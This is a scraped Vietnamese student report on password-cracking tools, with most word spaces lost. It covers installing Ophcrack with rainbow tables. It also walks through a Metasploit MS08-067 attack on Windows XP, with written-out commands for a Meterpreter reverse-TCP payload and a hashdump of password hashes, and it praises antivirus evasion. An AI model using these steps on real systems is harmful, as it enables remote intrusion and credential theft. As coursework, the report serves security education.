Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất

Ophcrack là phần mềm khôi phục mật khẩu Windows miễn phí tốt nhất hiện nay.Đối vớingười được trang bị những hiểu biết cơ bản về hệ điều hành mà lần đầu tiên muốn khôiphục mật khẩu thì Ophcrack quả là một công cụ rất nhanh và dễ dàng sử dụng.Để sử dụng Ophcrack, bạn không cần phải truy cập vào Windows để phục hồi mật khẩuđã mất.Ophcrack cung cấp cho bạn file ISO miễn phí và bạn có thể ghi ra đĩa CD rồikhởi chạy đĩa CD đó. Khi chương trình Ophcrack đã chạy, bạn xác định vị trí tài...
Nội dung trích xuất từ tài liệu:
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất BÔGIAODUCVAĐAOTAO ̣ ́ ̣ ̀ ̀ ̣ TRƯỜNGĐẠIHỌCMỞTPHCM KHOACÔNGNGHỆTHÔNGTIN  GiáoViênHướngDẫn:T.SĐàoThếLong Sinh viên: 1. Phan Công Lâm, Mssv:09H1012053 2.Nguyễn Thúc Toàn,Mssv:09H1012110 3.Nguyễn Huy Tưởng,Mssv:09H1012125 10,tháng11,năm2010OphcracklàphầnmềmkhôiphụcmậtkhẩuWindowsmiễnphítốtnhấthiệnnay.ĐốivớingườiđượctrangbịnhữnghiểubiếtcơbảnvềhệđiềuhànhmàlầnđầutiênmuốnkhôiphụcmậtkhẩuthìOphcrackquảlàmộtcôngcụrấtnhanhvàdễdàngsửdụng.ĐểsửdụngOphcrack,bạnkhôngcầnphảitruycậpvàoWindowsđểphụchồimậtkhẩuđãmất.OphcrackcungcấpchobạnfileISOmiễnphívàbạncóthểghirađĩaCDrồikhởichạyđĩaCDđó.KhichươngtrìnhOphcrackđãchạy,bạnxácđịnhvịtrítàikhoảnngườidùngWindowsvàthựchiệnquátrìnhkhôiphụcmậtkhẩu.Tấtcảcácbướcthựchiệnhoàntoànlàtựđộng.BáoCáo:5ToolsCrackPasswordPhổBiếnNhất Page11.CàiđặtOPHCRACKViệccàiđặtOphcracktươngđốidễ,tuynhiêncóphầnlựachọncácthànhphầncàiđặtcầnlưuý–Hình1.Hình1:ChọncáccompornentsđểcàiđặtvàomụctableschoophcrackTrênHình1,nếuđãdownload,cóthểlựachọnmộtsốlựachọnsau:Continuewithoutinstallthetable:CàiđặtchỉcóchươngtrìnhOphcrack,khôngcóRainbowTable.DownloadalphanumenictablefromInternet(388MBSSTI0410K):càiđặtvàdownloadRainbowTableloạiSSTI0410K.DownloadalphanumenictablefromInternet(733MBSSTI045K):càiđặtvàdownloadRainbowTableloạiSSTI045K.InstallalphanumenictablefromCDorDVD(388MBSSTI0410K):càiđặtOphcrackvàsửdụngRainbowTableloạiSSTI0410KtừCDhoặcDVD.InstallalphanumenictablefromCDorDVD(733MBSSTI045K):càiđặtOphcrackvàsửdụngRainbowTableloạiSSTI045KtừCDhoặcDVD.RainbowTableloạiSSTI045Kcókíchthước733MBđượcdùngchocácmáytínhcóRAMtừ512MBtrởlên.RainbowTableloạiSSTI0410Kcókíchthước388MBđượcdùngchocácmáytínhítRAMhơn.NếutrongtrườnghợpbạndownloadriêngđĩaLiveCD,hoặcdownloadcácRainbowTabletheolinkdướiđây,thìlựachọnContinuewithoutinstallthetable.BáoCáo:5ToolsCrackPasswordPhổBiếnNhất Page2Code:RainbowTableloạiSSTI0410K(388MB)http://lasecwww.epfl.ch/SSTIC0410k.zipRainbowTableloạiSSTI045K(733MB)http://lasecwww.epfl.ch/SSTIC045k.zipSaukhicàiđặt,chạychươngtrình,giaodiệncủaOphcracknhưHình2.Hình2:GiaodiệnOphcracktrênWindowsTrênhình2,trướckhisửdụng,clickvàonútTablesđểchọnđườngdẫnđếnbảngRainbowTable–hình3.Hình3:Selectophcracktable.BáoCáo:5ToolsCrackPasswordPhổBiếnNhất Page3TrênHình3,mởđếnđĩaLiveCD,mụcslax\ophcrack\tables,sauđónhắpOK.2.Kếthợpmetasploitvớiophcrackcrackpasswordwindowwinxpsp2.Trongvídụnàychúngtasẽdùngbacktrack4,trongđĩabacktracknàycótíchhợpsẵnmetasploitvàophcrack.Sauđâylàcácbướcđểthựchiệncácbướccrackmộtpasswordcủawindowxpsp2.ởđâytasẽlợidụnglỗibảomật“MicrosoftSecurityBulletinMS08067củaMicrosoftchoWindowsServerService”đểkhaithácthôngtin.ĐâylàlỗhổngnghiêmtrọngnằmtrongdịchvụServerServiceRPCcủahệđiềuhànhWindows.Vớilỗinày,Hackerhoàntoàncóthểđiềukhiểnmáytínhtừxavớiquyềncaonhấtcủahệthống.Mứcđộnguyhiểm:Rấtcao.MôtảkỹthuậtServerServicelàdịchvụchophépmáytínhcàiđặthệđiềuhànhWindowscóthểchiasẻfile,máyin,…quamạngvàlàdịchvụkhôngthểthiếucủahệđiềuhành.DịchvụnàyhỗtrợgiaothứcRPC,trongđócómộtchứcnăngtiếpnhậnvàxửlýmộtyêucầumuốnchuyểnđổiđườngdẫn(vídụ\\C\ProgramFiles\..\Windows)vềđịnhdạngđườngdẫnCanonicalization(\\C\Windows).Tuynhiên,quátrìnhxửlýnàyđãkhôngkiểmsoátđộdàicủađườngdẫntrongyêucầuvàxảyralỗitrànbộđệm.Nhưvậy,vớiviệcthựchiệnmộtyêucầuRPCvớiđườngdẫncóđộdài“quákhổ”,Hackerdễdàngthựcthimãđộctrêncácmáytínhtừxanhằmchiếmquyềnđiềukhiển,càiđặtvirus,ăncắpthôngtin…CácbướcthựchiệnBước1:Khichúngtakhởiđộngbacktrack.Chúngtamởmộtconsolevàgõlệnhtheocúphápsauđểchạymetasploit.BáoCáo:5ToolsCrackPasswordPhổBiếnNhất Page4Theonhưtấmhìnhnàytasẽsửdụngmetasploitphiênbản3.Bước2:tagõcúpháp:“useexploit/windows/smb/ms08_067_netapi”đểsửdụnglỗibảomậtnày.Bước3:ởbướcnàytasẽthựchiệncáclệnhđểcấuhìnhcácthuộctínhđểchuẩnbịchocuộctấncôngchiếmquyềnđiềukhiển.Cúpháp:setpayloadwindows/meterpreter/reverse_tcp//MetaInterpreterlàmộtadvancedpayload.Mucđíchcủanólàđểcungcấpnhữngtậplệnhđểkhaithác,tấncôngcácmáyremotecomputers.Nóđượcviếttừcácdevelopersdướidạngsharedobject(DLL)files.Meterpretervàcácthànhphầnmởrộngđượcthựcthitrongbộnhớ,hoàntoànkhôngđượcghilênđĩanêncóthểtránhđượcsựpháthiệntừcácphầnmềmchốngvirusMeterpretercungcấpmộttậplệnhđểchúngtacóthểkhaitháctrêncácremotecomputers.setRHOST192.168.1.1//đâylàđịachỉipcủamáyvictim.setLHOST192.168.1.2//đâylàđịachỉipcủamáytấncông.BáoCáo:5ToolsCrackPasswordPhổBiếnNhất Page5Khiđãchuẩnbịxongcáccấuhìnhtasẽcómộtbảngvớicácthongsốnhưhìnhtrên.Bước4:ởbướcnàytasẽtiếnhànhkhaitháclỗi.Bước5:Khiđãvàođượcmáyvictim.Tadunglệnhhashdumpđểhashfilesantrong ...